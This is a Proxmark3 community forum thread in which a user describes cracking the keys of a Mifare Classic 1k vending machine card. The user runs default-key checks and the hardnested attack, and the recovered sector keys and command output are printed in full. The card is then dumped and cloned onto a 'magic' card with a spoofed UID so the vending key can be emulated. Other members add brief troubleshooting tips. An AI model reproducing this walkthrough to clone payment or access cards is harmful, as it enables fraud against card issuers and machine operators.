Proxmark3 community

Research, development and trades concerning the powerful Proxmark3 device.

Remember; sharing is caring. Bring something back to the community.


"Learn the tools of the trade the hard way." +Fravia

You are not logged in.

Announcement

Time changes and with it the technology
Proxmark3 @ discord

Users of this forum, please be aware that information stored on this site is not private.

#1 2018-10-31 10:07:50

apotere
Contributor
Registered: 2018-10-30
Posts: 11

Vending machine Mifare key Hardnested

Hello people! Me and my friend have some questions on how to hack a vending machine Mifare CLASSIC 1k.
The mifare in question is a hardnested type.
With weak pseudorandom number generator we didn't have any kind of problems.
But with hardnested we are asking ourselfs if we are doing a good job.

So first of all we search for the high frequency mifare and get the following:

proxmark3> hf se

UID : 7b 0d 92 22
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: HARDENED (hardnested)

Valid ISO14443A Tag Found - Quiting Search

Then we try to check it with the default keys as usual ... but it seems prety locked

proxmark3> hf mf chk * ?
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 1a2b3c4d5e6f
chk default key[ 6] 123456789abc
chk default key[ 7] 010203040506
chk default key[ 8] 123456abcdef
chk default key[ 9] abcdef123456
chk default key[10] 4d3a99c351dd
chk default key[11] 1a982c7e459a
chk default key[12] d3f7d3f7d3f7
chk default key[13] 714c5c886e97
chk default key[14] 587ee5f9350f
chk default key[15] a0478cc39091
chk default key[16] 533cb6c723f6
chk default key[17] 8fd0a4f256e9

To cancel this operation press the button on the proxmark...
--o
|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000|  a0a1a2a3a4a5  | 1 |  ffffffffffff  | 0 |
|001|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|002|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|003|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|004|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|005|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|006|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|007|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|008|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|009|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|010|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|011|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|012|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|013|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|014|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|015|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|---|----------------|---|----------------|---|

so the first thing i think is ... well lets try with hardnested atack with a0a1a2a3a4a5 big_smile ! And it gives me the key eae8968d5c70 !


proxmark3> hf mf hard * A a0a1a2a3a4a5 10 A
--target block no: 10, target key type:A, known target key: 0x000000000000 (not
set), file action: none, Slow: No, Tests: 0
Using AVX2 SIMD core.
time    | #nonces | Activity                                                | expected to brute force
         |         |                                                         | #states         | time
--------------------------------------------------------------------------------
----------------------
       0 |       0 | Start using 4 threads and AVX2 SIMD core                |
               |
       0 |       0 | Brute force benchmark: 341 million (2^28.3) keys/s      | 1
40737488355328 |    5d
       1 |       0 | Using 235 precalculated bitflip state tables            | 1
40737488355328 |    5d
...
      20 |    1440 | Apply bit flip properties                               |
   15487296512 |   45s
      20 |    1440 | (Ignoring Sum(a8) properties)                           |
   15487296512 |   45s
      29 |    1440 | Starting brute force...                                 |
   15487296512 |   45s
      95 |    1440 | Brute force phase completed. Key found: eae8968d5c70    |
             0 |    0s
   


   
proxmark3> hf mf hard * A ffffffffffff 20 A
--target block no: 20, target key type:A, known target key: 0x000000000000 (not
set), file action: none, Slow: No, Tests: 0
Using AVX2 SIMD core.



time    | #nonces | Activity                                                | e
xpected to brute force
         |         |                                                         | #
states         | time
--------------------------------------------------------------------------------
----------------------
       0 |       0 | Start using 4 threads and AVX2 SIMD core                |
               |
       0 |       0 | Brute force benchmark: 350 million (2^28.4) keys/s      | 1
40737488355328 |    5d
       1 |       0 | Using 235 precalculated bitflip state tables            | 1
40737488355328 |    5d
#db# Authentication failed. Card timeout.




... and here is the question what comands should i launch now?
Am i doing this right?
What do i need to do now , if i need to emulate it after?

Thank you for your collaboration.

Offline

#2 2018-10-31 10:18:29

apotere
Contributor
Registered: 2018-10-30
Posts: 11

Re: Vending machine Mifare key Hardnested

Forgot to mention , i then added the key that has been found to default_keys.dic and executed :
hf mf chk * ? ./default_keys.dic that gave me this result:
|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000|  a0a1a2a3a4a5  | 1 |  ffffffffffff  | 0 |
|001|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|002|  eae8968d5c70  | 1 |  ffffffffffff  | 0 |
|003|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|004|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|005|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|006|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|007|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|008|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|009|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|010|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|011|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|012|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|013|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|014|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|015|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|---|----------------|---|----------------|---|

Offline

#3 2018-10-31 11:08:51

apotere
Contributor
Registered: 2018-10-30
Posts: 11

Re: Vending machine Mifare key Hardnested

so i am continuing to launch these commands everytime increasing by 4 the block number :

hf mf hard * A a0a1a2a3a4a5 0 A
.............
hf mf hard * A a0a1a2a3a4a5 4 A

and everytime i am adding the descoverd key to default_keys.dic and by launching hf mf chk * ? ./default_keys.dic the output is :

|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000|  a0a1a2a3a4a5  | 1 |  ffffffffffff  | 0 |
|001|  e96df21719be  | 1 |  ffffffffffff  | 0 |
|002|  eae8968d5c70  | 1 |  fa96f7ca8711  | 1 |
|003|  ebba460cc639  | 1 |  ffffffffffff  | 0 |
|004|  ec35e167359b  | 1 |  ffffffffffff  | 0 |
|005|  edaf6fdb9ed9  | 1 |  ffffffffffff  | 0 |
|006|  eed4781b585a  | 1 |  ffffffffffff  | 0 |
|007|  ef79fbce8bce  | 1 |  ffffffffffff  | 0 |
|008|  e06a8a878a21  | 1 |  ffffffffffff  | 0 |
|009|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|010|  e2c737ed3316  | 1 |  ffffffffffff  | 0 |
|011|  e3f90ff4ba70  | 1 |  ffffffffffff  | 0 |
|012|  e48172f43898  | 1 |  ffffffffffff  | 0 |
|013|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|014|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|015|  ffffffffffff  | 0 |  ffffffffffff  | 0 |
|---|----------------|---|----------------|---|
Needless to say i am continuing even if i don't know if i am doing something right big_smile

If someone could tell me if i am doing something wrong i would be happy to follow.

Last edited by apotere (2018-10-31 21:17:33)

Offline

#4 2018-10-31 21:54:07

apotere
Contributor
Registered: 2018-10-30
Posts: 11

Re: Vending machine Mifare key Hardnested

Now that i got all the keys for all the blocks :


hf mf chk * ? ./default_keys.dic


|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000|  a0a1a2a3a4a5  | 1 |  f8a4e8d9f4a1  | 1 |
|001|  e96df21719be  | 1 |  f9166635409a  | 1 |
|002|  eae8968d5c70  | 1 |  fa96f7ca8711  | 1 |
|003|  ebba460cc639  | 1 |  fbe05a0fc474  | 1 |
|004|  ec35e167359b  | 1 |  fca7e1b85fcf  | 1 |
|005|  edaf6fdb9ed9  | 1 |  fd1f82ab8613  | 1 |
|006|  eed4781b585a  | 1 |  fecf0f1f927e  | 1 |
|007|  ef79fbce8bce  | 1 |  ffd0e0d3d4dc  | 1 |
|008|  e06a8a878a21  | 1 |  f0f17ba7db5c  | 1 |
|009|  e18f1bfeffbb  | 1 |  f117de730420  | 1 |
|010|  e2c737ed3316  | 1 |  f2925a13b3d8  | 1 |
|011|  e3f90ff4ba70  | 1 |  f3c8f8c4ff92  | 1 |
|012|  e48172f43898  | 1 |  f4f99dcb9d8a  | 1 |
|013|  e58279d9ff09  | 1 |  f5068427a2c4  | 1 |
|014|  e66023533727  | 1 |  f6c9f83b0b24  | 1 |
|015|  e752a5b81cf5  | 1 |  f76796010efd  | 1 |
|---|----------------|---|----------------|---|



How can i dump them in a bin file?

Offline

#5 2018-10-31 22:24:09

apotere
Contributor
Registered: 2018-10-30
Posts: 11

Re: Vending machine Mifare key Hardnested

pretty good website :
https://scund00r.com/all/rfid/2018/06/0 … sheet.html big_smile has all what i needed to emulate the vendor key.
Have a good day !

Offline

#6 2018-10-31 23:04:09

apotere
Contributor
Registered: 2018-10-30
Posts: 11

Re: Vending machine Mifare key Hardnested

so now i am tring to restore the dump in another card that has arived with the proxmark :
hf mf restore

Restoring dumpdata.bin to card
Writing to block   0: 7b 0d 92 22 c6 88 04 00 c8 18 00 20 00 00 00 14
#db# Cmd Error: 04
#db# Write block error
#db# WRITE BLOCK FINISHED
isOk:00
Writing to block   1: 7b 00 26 88 26 88 00 00 00 00 00 00 00 00 00 00
#db# WRITE BLOCK FINISHED
isOk:01
Writing to block   2: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
#db# WRITE BLOCK FINISHED
isOk:01


But on the first block [0] i get this error : #db# Cmd Error: 04

Can someone advise?

Offline

#7 2018-11-02 10:58:13

apotere
Contributor
Registered: 2018-10-30
Posts: 11

Re: Vending machine Mifare key Hardnested

Hello there!
We managed to restore the data on a chinese magic mifare and we managed to set the "fake" uid.
Now if we try to restore the data or to write to a block it gives this error:
#db# Authentication failed. Card timeout.
#db# Auth error
#db# WRITE BLOCK FINISHED

Can someone tell me how to wipe it to 0 so i can restore it one more time , or how can i find the key to write to the card a specific block?
Thank you

Offline

#8 2018-11-03 21:30:08

merlok
Contributor
Registered: 2011-05-16
Posts: 132

Re: Vending machine Mifare key Hardnested

try to show `hf 14a info` of magic card. if there is no backdoor command - you have to buy another card...

Offline

#9 2018-11-04 15:58:47

iceman
Administrator
Registered: 2013-04-25
Posts: 9,538
Website

Re: Vending machine Mifare key Hardnested

script list,    try remagic script

Offline

#10 2019-09-29 10:49:43

ulisse
Contributor
Registered: 2019-09-29
Posts: 8

Re: Vending machine Mifare key Hardnested

Hello you can tell me that you have to use commands with Prof Mark to be able to read the keys in a me make classic
Honestly I can not understand what commands you have to enter so that give me all the keys and all blocks do not know how to do you can help me please

Offline

Board footer

Powered by FluxBB